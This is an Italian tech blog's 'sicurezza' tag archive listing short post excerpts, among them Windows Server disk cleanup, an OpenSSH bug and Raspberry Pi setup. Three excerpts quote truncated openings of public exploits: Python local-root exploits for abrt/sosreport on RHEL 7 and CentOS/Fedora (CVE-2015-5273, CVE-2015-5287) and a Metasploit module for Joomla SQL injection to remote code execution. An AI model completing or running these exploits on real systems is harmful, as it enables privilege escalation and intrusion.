Tags archives: sicurezza

 

0

Recuperare spazio disco su Windows Server

In una installazione di Windows Server con un disco di sistema abbastanza ristretto, tipo 30Gb è facile ritrovarsi con pochi GB disponibili dopo un certo periodo. Una delle principali problematiche, ho avuto modo di capire, viene fuori dagli aggiornamenti di Windows e dai service packs che vengono scaricati ed usati per i vari aggiornamenti. Ma […]

L’articolo Recuperare spazio disco su Windows Server sembra essere il primo su RinoRusso.it.

 

0

OpenSSH, un bug può mettere a rischio le chiavi private

 

0

Come scoprire chi sta utilizzando la nostra rete Wi-Fi

 

0

Check Point: violare EZCast è fin troppo semplice!

 

0

Creare una Debian Jessie Live persistente con firmware non-free

 

0

Server Cloud WebDav su Raspberry pi 2 e Debian Jessie

 

0

RHEL 7.0 / 7.1 abrt / sosreport Local Root

#!/usr/bin/python # CVE-2015-5287 (?) # abrt/sosreport RHEL 7.0/7.1 local root # rebel 09/2015   # [user@localhost ~]$ python sosreport-rhel7.py # crashing pid 19143 # waiting for dump directory # dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143 # waiting for sosreport directory # sosreport: sosreport-localhost.localdomain-20151130194114 # waiting for tmpfiles # tmpfiles: [‘tmpurfpyY’, ‘tmpYnCfnQ’] # moving directory # moving tmpfiles # […]

 

0

CentOS 7.1 / Fedora 22 abrt Local Root

#!/usr/bin/python # CVE-2015-5273 + CVE-2015-5287 # CENTOS 7.1/Fedora22 local root (probably works on SL and older versions too) # abrt-hook-ccpp insecure open() usage + abrt-action-install-debuginfo insecure temp directory usage # rebel 09/2015 # —————————————-   # [user@localhost ~]$ id # uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 # [user@localhost ~]$ cat /etc/redhat-release # CentOS Linux release 7.1.1503 (Core) […]

 

0

Joomla Content History SQL Injection Remote Code Execution

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper   def initialize(info={}) super(update_info(info, ‘Name’ => “Joomla Content History SQLi Remote Code Execution”, ‘Description’ => %q{ This module exploits a SQL injection vulnerability found in Joomla versions […]